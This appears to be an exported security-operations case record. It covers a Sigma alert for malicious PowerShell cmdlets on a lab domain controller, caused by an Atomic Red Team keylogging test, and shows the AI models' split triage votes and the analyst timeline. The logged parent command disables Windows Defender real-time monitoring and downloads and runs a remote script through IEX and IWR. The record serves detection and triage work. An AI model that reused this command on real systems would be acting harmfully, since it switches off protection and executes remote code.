โ
Case #486
service.windows_process_creation/proc_creation_win_powershell_malicious_cmdlets
๐ท๏ธ Analyst Verdict Classification
SUSPICIOUS by analyst๐ค AI Analysis
๐ Detections (1)
Malicious PowerShell Commandlets - ProcessCreation
high
Rule: service.windows_process_creation/proc_creation_win_powershell_malicious_cmdlets
Hostname: df-labsdc01.dflabs.local ยท Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 96% ยท Verdict: suspicious
Event Data:
COMMAND_LINE:
"powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1\"") {exit 0} else {exit 1}}
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
40960
PARENT:
{'BASE_ADDRESS': 140694944940032, 'COMMAND_LINE': "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ", 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', 'HASH': 'de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c', 'MEMORY_USAGE': 193449984, 'PARENT_ATOM': '0c13305cb3f73d15515e789969c2a835', 'PARENT_PROCESS_ID': 2440, 'PROCESS_ID': 3164, 'THIS_ATOM': '6b593eddb775332b5050941f69c2a838', 'THREADS': 32, 'TIMESTAMP': 1774364726507, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3164
PROCESS_ID:
9152
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1
MITRE:
T1056.001
T1562.001
Analyst Declaration:
๐ Raw Detection JSON
{
"author": "_ext-sigma-7a14fbc3-54d9-4b4d-8700-61eddada04f0[bulk][segment]",
"cat": "Malicious PowerShell Commandlets - ProcessCreation",
"detect": {
"event": {
"COMMAND_LINE": "\"powershell.exe\" \u0026 {if (Test-Path \\\"\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\\"\") {exit 0} else {exit 1}}",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 40960,
"PARENT": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 193449984,
"PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
"PARENT_PROCESS_ID": 2440,
"PROCESS_ID": 3164,
"THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
"THREADS": 32,
"TIMESTAMP": 1774364726507,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 3164,
"PROCESS_ID": 9152,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "827f395b-c68d-4fac-9c3e-919833d5349d",
"event_time": 1774364762714,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 1224,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "de7904f7b26fa572efe4a73369c2a85b"
}
},
"detect_id": "414ce72d-935e-4763-a1d8-051c69c2a85b",
"detect_mtd": {
"author": "Nasreddine Bencherchali (Nextron Systems)",
"description": "Detects Commandlet names from well-known PowerShell exploitation frameworks",
"falsepositives": [
"Unknown"
],
"level": "high",
"references": [
"https://adsecurity.org/?p=2921",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
"https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
"https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
"https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://github.com/calebstewart/CVE-2021-1675",
"https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
"https://github.com/HarmJ0y/DAMP",
"https://github.com/samratashok/nishang",
"https://github.com/DarkCoderSc/PowerRunAsSystem/",
"https://github.com/besimorhino/powercat",
"https://github.com/Kevin-Robertson/Powermad",
"https://github.com/adrecon/ADRecon",
"https://github.com/adrecon/AzureADRecon",
"https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1",
"https://github.com/The-Viper-One/Invoke-PowerDPAPI/",
"https://github.com/Arno0x/DNSExfiltrator/"
],
"tags": [
"attack.execution",
"attack.discovery",
"attack.t1482",
"attack.t1087",
"attack.t1087.001",
"attack.t1087.002",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1069",
"attack.t1059.001"
]
},
"gen_time": 1774364763945,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364762\u0026selected=de7904f7b26fa572efe4a73369c2a85b",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "827f395b-c68d-4fac-9c3e-919833d5349d",
"event_time": 1774364762714,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 1224,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "de7904f7b26fa572efe4a73369c2a85b"
},
"rule_tags": [
"attack.execution",
"attack.t1482",
"attack.t1087",
"attack.t1087.002",
"ext:ext-sigma",
"attack.discovery",
"attack.t1087.001",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1069",
"attack.t1059.001"
],
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "service.windows_process_creation/proc_creation_win_powershell_malicious_cmdlets",
"ts": 1774364764000
}
๐ Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
๐ค Triage JSON
{
"confidence": 0.965,
"false_positive_reason": "Authorized security testing / Malicious activity simulation",
"investigation_questions": [
"Was this host part of a scheduled detection validation exercise?",
"Who is the owner of the NT AUTHORITY\\SYSTEM session that executed the parent installation script?"
],
"ioc_analysis": "The PowerShell binary (powershell.exe) is a signed Microsoft system component running from its standard location. The command line arguments and file paths (\u0027C:\\AtomicRedTeam\\...\u0027) are characteristic of the Atomic Red Team testing framework, indicating a simulated attack rather than a malicious actor.",
"iocs_extracted": [
"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1"
],
"mitre_techniques": [
"T1056.001",
"T1562.001"
],
"recommended_actions": [
"Manual analyst review required \u2014 AI models (split)",
"Verify with the security team if Atomic Red Team testing was scheduled for this host.",
"If unauthorized, investigate the user who initiated the Atomic Red Team installation.",
"Re-enable Windows Defender Real-time Monitoring if the test has concluded."
],
"risk_score": 12,
"severity": "high",
"summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** benign | **Confidence:** 0.98\nThe detection triggered on a PowerShell process checking for the existence of an Atomic Red Team (ART) script. The command line and its parent process are explicitly performing authorized security testing via the Invoke-AtomicRedTeam framework for MITRE ATT\u0026CK technique T1056.001 (Input Capture: Keylogging).\n\n**IOC Analysis:** The PowerShell binary (powershell.exe) is a signed Microsoft system component running from its standard location. The command line arguments and file paths (\u0027C:\\AtomicRedTeam\\...\u0027) are characteristic of the Atomic Red Team testing framework, indicating a simulated attack rather than a malicious actor.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.95\nThis event is a false positive because the malicious commandlet detection rule triggered on a legitimate Windows system binary (powershell.exe) running from its expected location in System32 under the SYSTEM user context. The process tree shows this PowerShell instance was spawned by another PowerShell process executing Atomic Red Team installation scripts, which is a known security testing framework.\n\n**IOC Analysis:** The IOCs are benign because powershell.exe is a legitimate Microsoft-signed binary located at C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe with the correct hash (de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c). The command line contains Atomic Red Team testing scripts, which are legitimate security assessment tools. The parent process shows PowerShell executing installation commands for Atomic Red Team, indicating this is a controlled security test environment rather than an attack.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\nFailed or timed out.",
"verdict": "suspicious",
"voting": {
"auto_action": "manual_review",
"mode": "split",
"total_models": 2,
"vote_summary": [
"gemini-cli: benign (low, 98% confidence)",
"qwen3.5:4b: false_positive (high, 95% confidence)"
],
"votes": [
{
"confidence": 0.98,
"model": "gemini-cli",
"verdict": "benign"
},
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "false_positive"
}
],
"winning_count": 1,
"winning_verdict": "suspicious"
}
}
โ๏ธ Response Actions
| Action | Target | Status | Result | |
|---|---|---|---|---|
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | User Activity Investigation: 32 events found | ||
| recommended | executed | General Activity Sweep: 0 events found |
๐ Add Note
๐ฌ Notes (5)
๐ค FusionSOC AI
2026-03-24T15:34
๐ค FusionSOC AI
2026-03-24T15:34
๐ค FusionSOC AI
2026-03-24T15:34
๐ค FusionSOC AI
2026-03-24T15:34
๐ค FusionSOC AI
2026-03-24T15:34
๐ Timeline
2026-03-24T17:30:27
analyst
Status changed: investigating โ closed
2026-03-24T17:30:23
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T15:34:18
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:34:18
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T15:34:18
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Re-enable Windows Defender Real-time Monitoring if the test has concluded. **Sen...
2026-03-24T15:34:18
FusionSOC
Response action queued: recommended on Re-enable Windows Defender Real-time Monitoring if the test has concluded.
2026-03-24T15:34:18
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:34:18
FusionSOC
Action recommended โ executed: User Activity Investigation: 32 events found
2026-03-24T15:34:18
FusionSOC AI
Note by FusionSOC AI: ## ๐ User Activity Investigation **Action:** If unauthorized, investigate the user who initiated the Atomic Red Team ins...
2026-03-24T15:34:17
FusionSOC
Response action queued: recommended on If unauthorized, investigate the user who initiated the Atomic Red Team installation.
2026-03-24T15:34:17
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:34:17
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T15:34:17
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Verify with the security team if Atomic Red Team testing was scheduled for this ...
2026-03-24T15:34:17
FusionSOC
Response action queued: recommended on Verify with the security team if Atomic Red Team testing was scheduled for this host.
2026-03-24T15:34:17
FusionSOC AI
Status changed: open โ investigating
2026-03-24T15:34:17
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T15:34:17
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Manual analyst review required โ AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T15:34:17
FusionSOC
Response action queued: recommended on Manual analyst review required โ AI models (split)
2026-03-24T15:34:17
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T15:34:17
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T15:34:16
FusionSOC AI
Detection 414ce72d-935e-4763-a1d8-051c69c2a85b triaged as suspicious (high severity, confidence: 96%)
2026-03-24T15:34:16
FusionSOC AI
Case created from detection: service.windows_process_creation/proc_creation_win_powershell_malicious_cmdlets